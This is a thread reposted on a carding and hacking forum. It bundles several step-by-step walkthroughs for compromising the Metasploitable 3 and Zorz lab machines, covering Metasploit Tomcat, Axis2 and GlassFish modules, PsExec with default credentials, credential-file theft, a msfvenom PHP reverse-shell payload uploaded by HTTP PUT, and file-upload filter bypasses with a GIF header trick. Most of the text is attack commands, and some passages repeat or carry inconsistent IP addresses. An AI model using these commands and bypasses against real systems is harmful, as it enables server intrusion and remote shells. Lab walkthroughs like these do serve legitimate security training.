+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Penetration Testing in Metasploitable 3 with SMB and Tomcat (/Thread-Guide-How-to-Penetration-Testing-in-Metasploitable-3-with-SMB-and-Tomcat)
[Guide] How to Penetration Testing in Metasploitable 3 with SMB and Tomcat - NINZA - 04-25-2020
Target: Metasploitable 3
Attacker: Kali Linux
Let’s begin through scanning the target IP to know the Open ports for running services. I am using nmap command for scanning the target PC. Type the following command on terminal in kali Linux.
nmap –p- -sV 192.168.1.14
From nmap result we can see port 8282 is open for apache tomcat
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-avyf4ehmcuU/WFUscv16_WI/AAAAAAAAOtI/WCDdvpMgyPkfWNzTK2tNoDzzCUEtkySkgCLcB/s640/1.png?w=687&ssl=1)
Open target IP on browser as 192.168.1.14:8282 Tomcat is running on port 8282, but requires credentials to access.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-YgfmupyOoHI/WFUscrTlIWI/AAAAAAAAOtE/_EzTByrawHsPF76BiT1M0X8uarucTIudQCLcB/s640/2.png?w=687&ssl=1)
Now we are going to login with psexec using smb port 445
Psexec.exe
Psexec.exe is software that helps us to access other computers in a network. This software directly takes us to the shell of the remote PC with advantage of doing nothing manually. Download this software from –>
[To see content please register here]
.Unzip the file once you have downloaded it. Go to you command prompt and type:
PsExec.exe \\192.168.1.14 -u vagrant -p vagrant cmd
This command is addressing the host IP and its credential which I have access from my previous article read from
[To see content please register here]
.-u for username: vagrant
-p for password: vagrant
cmd: to enter victim’s command prompt
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-yAVTitmmHhI/WFUscfu9eTI/AAAAAAAAOtA/tRU3PkWOI_QpUPmeUU3d1J1JHTEuyE8ZgCLcB/s1600/3.png?w=687&ssl=1)
As I already had a shell, I was able to retrieve the credentials from the tomcat-users.xml file, located at c:\program files\apache software foundation\tomcat\apache-tomcat-8.0.33\conf.
Type tomcat-users.xml
As soon as the command execute you can see I had got credential for tomcat username sploit and password sploit. Use this credential for attack using metasploit framework in kali Linux.
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-yqpfGNJhBkk/WFUsdGezvsI/AAAAAAAAOtM/cgzxRhqNBKkEM4qKLUiDguRbLpbRtU7EwCLcB/s1600/4.png?w=687&ssl=1)
Start metasploit framework by typing msfconsole on terminal in kali Linux when metasploit get loaded type given below command for tomcat attack.
This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.
msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(tomcat_mgr_upload) > set rhost 192.168.1.14
msf exploit(tomcat_mgr_upload) > set rport 8282
msf exploit(tomcat_mgr_upload) > set HttpUsername sploit
msf exploit(tomcat_mgr_upload) > set HttpPassword sploit
msf exploit(tomcat_mgr_upload) > exploit
Wonderful!!! Our meterpreter session is opened and you have got victim shell.
Meterpreter> sysinfo
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-bqmWVCc5b-4/WFUsdNzfoqI/AAAAAAAAOtQ/FqgZ345m5EQiqMnpKk5ywZQ_eHgQ0g-_ACLcB/s640/5.png?w=687&ssl=1)
Another way to exploit your target
This module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.
msf > use exploit/multi/http/axis2_deployer
msf exploit(axis2_deployer) > set rhost 192.168.1.8
msf exploit(axis2_deployer) > set rport 8282
msf exploit(axis2_deployer) >exploit
Awesome!!! Meterpreter session is opened again and you have got victim shell once again.
Meterpreter> sysinfo
Meterpreter> getuid
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-9D0Pql1Es0A/WFUsdLGIeOI/AAAAAAAAOtU/A7S2XYOKXQcgP5TJ0tppYACCvE-zFljXQCLcB/s640/6.png?w=687&ssl=1)
Target: Metasploitable 3
Attacker: Kali Linux
Use nmap command for scanning the target PC. NMAP will show all available open ports and their running services. Type the following command on terminal in kali Linux for aggressive scan.
nmap –p- -A 192.168.1.14
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-NeAnGdm37CQ/WFQgHV6xfII/AAAAAAAAOso/J30xRwIKogQOqHqzgESywKCtJrub0QKpgCLcB/s640/2.png?w=687&ssl=1)
Open target IP on browser with one of unknown port 4848as 192.168.1.14:4848
![[Image: 3.1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-dgKu7qUrRKA/WFQgHN7z86I/AAAAAAAAOsg/XZI7vbm7fAc-EyVb46-DqChOeaaA6-XIACLcB/s640/3.1.png?w=687&ssl=1)
Start metasploit framework by typing msfconsole on terminal in kali Linux when metasploit get loaded type given below command for attack.
This module attempts to login to GlassFish instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It will also try to do an authentication bypass against older versions of GlassFish. Note: by default, GlassFish 4.0 requires HTTPS, which means you must set the SSL option to true, and SSLVersion to TLS1. It also needs Secure Admin to access the DAS remotely.
msf > use auxiliary/scanner/http/glassfish_login
msf auxiliary(glassfish_login) > set rhosts 192.168.1.14
msf auxiliary(glassfish_login) > set rport 4848
msf auxiliary(glassfish_login) > set STOP_ON_SUCCESS true
msf auxiliary(glassfish_login) > set user_file /root/Desktop/user.txt
msf auxiliary(glassfish_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(glassfish_login) >exploit
After few attempt successfully we have our login for GLASSFISH as admin: sploit
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-n2Q0lo1G9Ik/WFQgHQQP3mI/AAAAAAAAOsk/aY-LeG98PGYY-HPUGWFjOSzCUrqqdOyJgCLcB/s1600/3.png?w=687&ssl=1)
Let use this credential which we have got from metasploit and try to open target IP in browser as I am using: 192.168.1.14:4848/common/index.php
This URL gets open for administration console here it is asking for user and password login, now try to use admin: sploit as username and password respectively.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-qZtNS0OVGHw/WFQgHtx9b5I/AAAAAAAAOss/CwtMxwYHw5Qq6fislK9dHCCURdP7OQFxQCLcB/s640/4.png?w=687&ssl=1)
Through these credential we have breach admin console and got glassfish console and this page consist several common task.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-8t3xAsB4HBs/WFQgHxfotOI/AAAAAAAAOsw/dkhX5JFd_M4Sh2JtIuyoAcKH1umXdoScQCLcB/s640/5.png?w=687&ssl=1)
Target: Metasploitable 3
Attacker: Kali Linux
Scan the target IP to know the Open ports for running services. I am using nmap command for scanning the target PC. Type the following command on terminal in kali Linux.
nmap –p- 192.168.1.14
As you can see it is showing multiple unknown open ports but we are not able to find running services on target IP.
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-O7VnqiaaD2o/WFOz9QCdh-I/AAAAAAAAOrs/tHyg5mn0hTkYZRnf8Ox56wVXLXDZKxatgCLcB/s1600/1.png?w=687&ssl=1)
Open target IP on browser with one of unknown port 8585 as 192.168.1.14:8585
![[Image: 3.1.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-OmujO4yvF2Q/WFOz9t6etYI/AAAAAAAAOr0/UlANaQCxflQNolsenEE0_nBnZqXKQA7NwCLcB/s640/3.1.png?w=687&ssl=1)
Under this URL I have got directories like upload and word press lets penetrate inside it. Again type following URL on browser.
192.168.1.14:8585/uploads/
Now we are inside the upload directory but it is showing nothing special.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-bqxTFfG3x7E/WFOz-HBBGcI/AAAAAAAAOr4/oVUQOdX2TMIZUTuRvkPy-DmlBaLFOaFPQCLcB/s640/3.png?w=687&ssl=1)
Since Nmap is fail to give complete detail about open ports therefore now I will scan again the target IP using NIKTO with open port for upload directory hence type following command on terminal
Nikto –h
[To see content please register here]
It’ll scan multiple ports on a server and checks for server configuration items such as the presence of multiple index files, HTTP server options.
it is showing that in upload directory HTTP method PUT allows client to save files on the web server which means I can upload a file on server and this stage could became the part of attack by uploading a malicious file as backdoor in web server.
![[Image: 4.1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-fyVOj3PBk2Q/WFO0AEwEtlI/AAAAAAAAOsA/TFDV2AK6uOACto04_SAKqOqcnp58UmqmACLcB/s640/4.1.png?w=687&ssl=1)
Install poster plug-in from Firefox add-on. As poster let you perform HTTP request with parameters like: GET, POST, PUT and DELETE.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-Vae-oVNB-_Y/WFOz_UNMRGI/AAAAAAAAOr8/TPnaG69pv_Q8gOFJG0diILbH4Dzi3yf6wCLcB/s640/4.png?w=687&ssl=1)
Prepare the malicious file that you would upload with msfvenom :
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.14 lport=4444 -f raw
Copy the code from <?php to die() and save it in a file with .php extension. I had save the backdoor as shel.php on desktop and will later browser this file through poster to upload on webserver.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-T9XE4HtzfGs/WFO0A_mk-SI/AAAAAAAAOsE/XP7JnJA1pQM38hT915IP0ZUKWqQl7oQOQCLcB/s640/6.png?w=687&ssl=1)
Click on the tools from the menu bar. And then click on Poster from the drop down menu.
![[Image: 8.1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-Gh-DQU_9T4w/WFO0A9SEWcI/AAAAAAAAOsI/YL298L3VGys_JZPXaLXqdtaSZsfBa0J2gCLcB/s640/8.1.png?w=687&ssl=1)
A following dialog box will open. Here, browse the file that you will upload and click on PUT option. This exploring will show you that PUT is allowed that means you can upload through it
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-B6maiWQ2RSU/WFO0BMRtXeI/AAAAAAAAOsM/ziXXnbsycrU40z7BTdC4LSC74syn_WwyACLcB/s1600/8.png?w=687&ssl=1)
It will show you that the file is uploaded and displays complete results including headers.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-kwcPY7vx3xA/WFO0By4fMOI/AAAAAAAAOsQ/9MME_FXAgq0GH1rDg8ZTbSOsFermWn-fQCLcB/s1600/9.png?w=687&ssl=1)
And you can see the same on your browser that you file will be uploaded (as in our case the file is shel.php)
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-OE4o1ZuY-hE/WFOz8Y82sbI/AAAAAAAAOro/NDeR9-1i_pcSfjpO3uZIY7u1q7SI0VYXwCLcB/s640/10.png?w=687&ssl=1)
Simultaneously, open metasploit and use multi/handler:
use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.12
set lport 4444
exploit
After hitting enter button on your keyboard, run the file you just uploaded. It will give you a meterpreter session.
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-PSg2cLSmbNs/WFOz9VlzEAI/AAAAAAAAOrw/7b9iS1DZvHkHT7UBx87DUh9HwSFs0T_owCLcB/s640/11.png?w=687&ssl=1)
Zorz is another VM that will challenge your webapp skills. There are 3 separate challenges (web pages) on this machine. It should be pretty straight forward. This machine will probably test your web app skills once again. There are 3 different pages that should be focused on(you will see). Your goal is to successfully upload a web-shell or malicious file to the server.
This machine (zorz) does not runs on vmware. So, in case you are using your Kali Linux in vmware(for attacking), you will probably need to run Zorz on a different system in Virtual Box and of course in the same network.
You can download this machine from here:
[To see content please register here]
Penetration Methodolgies:
- Network Scaning (Netdiscover, Nmap)
- Exploting Each level of File Uploading vulnbility
- Directory brute force attack (Dirb)
- Obtain Netcat session for each level.
Let’s start with our all time favourite netdiscover to get the victim machine’s IP.
netdiscover
1
netdiscover
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-zo31kBPwy1c/W46mtgrjRZI/AAAAAAAAaFc/pZPAqLx460UZJvXgtV837IZpqJH7t0iggCLcBGAs/s1600/1.png?w=687&ssl=1)
So, our target is located on 192.168.1.8. Let’s quickly do an nmap scan to get an idea of open ports.
nmap -A 192.168.1.129
1
nmap -A 192.168.1.129
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-8QcmaTGS2RA/W46mwGEBnyI/AAAAAAAAaGI/N09o-RbaVB42wDBaOhyjwR-GFQ4LpdFNwCLcBGAs/s1600/2.png?w=687&ssl=1)
Ok, so we have port 22 and port 80 open. Let’s visit the IP on our browser.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-atW6h4tlWrE/W46mwLCj88I/AAAAAAAAaGM/Oldg1HbdsesSQfv69b2twzmcKHR9HTBugCLcBGAs/s1600/3.png?w=687&ssl=1)
And it opened up like a beautiful treasure! As you can see, according this web page “contact Support” here we can attached our file and can discuss our problem.
So, here is what we did.
Traverse to the directory: /usr/share/webshells/php/php-reverse-shell.php
Open it with text editor and add listening IP and port and save this file as php-reverse-shell.jpg and start netcat at listening port.
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-rVz56_46VJo/W46mwXyko0I/AAAAAAAAaGQ/rWaghLV8c7kw_OuBwuSsPtX954Kiqx7HACLcBGAs/s1600/4.png?w=687&ssl=1)
Next we try to upload this file and our shell gets uploaded successfully.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-Dxy6I7aw8Rs/W46mwlLUw1I/AAAAAAAAaGU/-E0wY7jdePEqZVQq0SHhEDp5ZGXPma0nACLcBGAs/s1600/5.png?w=687&ssl=1)
But we have no idea as to where our file gets uploaded on the server. In order to get the location/directory of our shell, we run dirb using the dictionary /usr/share/dirb/wordlists/big.txt
dirb
[To see content please register here]
/usr/share/dirb/wordlists/big.txt1
dirb
[To see content please register here]
/usr/share/dirb/wordlists/big.txt![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-vDWrCl0rsIA/W46mxd3zRbI/AAAAAAAAaGY/QmjXUeu2XCwm7wAoreUlaZoRktO_G5SrACLcBGAs/s1600/6.png?w=687&ssl=1)
And we get to know of a directory named “uploads2”. Upon visiting this directory, we do not find our shell.php file there. Thus we try to manipulate the directory name and visit the directory”uploads1”. Click the php file to open it.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-ROpv4dp6Iok/W46mx7Xd7DI/AAAAAAAAaGc/-7l5-4__Li8XXTRv6lz2ogJXqt0xJYxEQCLcBGAs/s1600/7.png?w=687&ssl=1)
We have successfully exploited the level 1 security and we have a netcat session running right before us.
nc -lvp 1234
1
nc -lvp 1234
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-IKEqOlFyzmc/W46mycMzHpI/AAAAAAAAaGg/VTxiIfjtyVIaUtrTSsGGNWDvQjbRbCmlACLcBGAs/s1600/8.png?w=687&ssl=1)
Now let’s go for the second level (Zorz Image Uploader 2) and try uploading the same file there.
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-iqLI9Gn6-vw/W46myzHKYYI/AAAAAAAAaGk/ew-DBkglCS8lVzNbmSa0T6jefG1MfMIkgCLcBGAs/s1600/9.png?w=687&ssl=1)
But this time we got error, here we can upload only image with .jpg, png and GIF extension.
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-WEiv2aSCqOk/W46mttTUdTI/AAAAAAAAaFg/SSPNQ-hbneAJ6Bzda7B02IY9Q_DdsU8UwCLcBGAs/s1600/10.png?w=687&ssl=1)
Time for some more tricks. Let us open the php-reverse-shell.php file in a text editor and just before our script, add the string “GIF98” and rename the file as “php-reverse-shell.php.jpg” and try to upload it once again.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-1SOIU0-0un0/W46mt0ZdEbI/AAAAAAAAaFk/oNW7TzEs8rQ13N8GB097bGvPGhMLHrVwQCLcBGAs/s1600/11.png?w=687&ssl=1)
And this time It got upload successfully !!!!!!!!!!!
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-6imzBsdP4nk/W46mufmhkJI/AAAAAAAAaFs/WfdpILVGBuUmy61FyS0ba2W1TJKjkS2wgCLcBGAs/s1600/13.png?w=687&ssl=1)
Time to execute the backdoor and this time the location of our file is “uploads2”. Let’s open it.
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-Grbat7oxKxA/W46muQSLqBI/AAAAAAAAaFw/5rfN3e7KJXEohlbI0mD6P1_oWZxQhBgXQCLcBGAs/s1600/14.png?w=687&ssl=1)
As you can observe again we got new netcat session and compromised victim’s VM successfully.
nc -lvp 1234
1
nc -lvp 1234
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-ugzA3LVB9hI/W46musRhmjI/AAAAAAAAaF0/Pyfn7MpYjmkUADGSQ3AEFPxbVcWmjOEOwCLcBGAs/s1600/15.png?w=687&ssl=1)
Now for our final task, we open the third level (Zorz Image Uploader 3) in order to upload backdoor but here clearly Note is given for the file type you will be uploading. The uploading file should be an image with .jpeg, jpg and png extension and less than 100kb.
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-YB9aTTyNjWM/W46mvO-2Y6I/AAAAAAAAaF4/APsibHTLZ_cjrm_WqfBlN5My2NxFYDBcgCLcBGAs/s1600/16.png?w=687&ssl=1)
And without any edits to our “php-reverse-shell.php” file, we try uploading it here. The file uploads successfully once again. And this time the directory it has been uploaded to is uploads3.
![[Image: 17.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-nj5_Vg8JYLs/W46mvDAIKpI/AAAAAAAAaF8/VqkD_XgVzfwo7UJVkzysAt-FMhVHv6V8QCLcBGAs/s1600/17.png?w=687&ssl=1)
Let’s visit /uploads3 directory to execute the uploaded backdoor and try to obtain netcat session once again.
![[Image: 18.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-EARLR7DyzJk/W46mvcC1ZGI/AAAAAAAAaGA/hYMiixr63Zk2TF-F4W-NOwYHBL0j8WyQwCLcBGAs/s1600/18.png?w=687&ssl=1)
As you can observe again we got new netcat session and compromised victim’s VM successfully.
nc -lvp 1234
Mission accomplished. We have successfully bypassed all the three levels of security on this machine.
![[Image: 19.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-DhqaUgBzNv0/W46mv5WY7dI/AAAAAAAAaGE/bsJsoWcBDxAf_u-BgcWqlt8_9uLDOGxagCLcBGAs/s1600/19.png?w=687&ssl=1)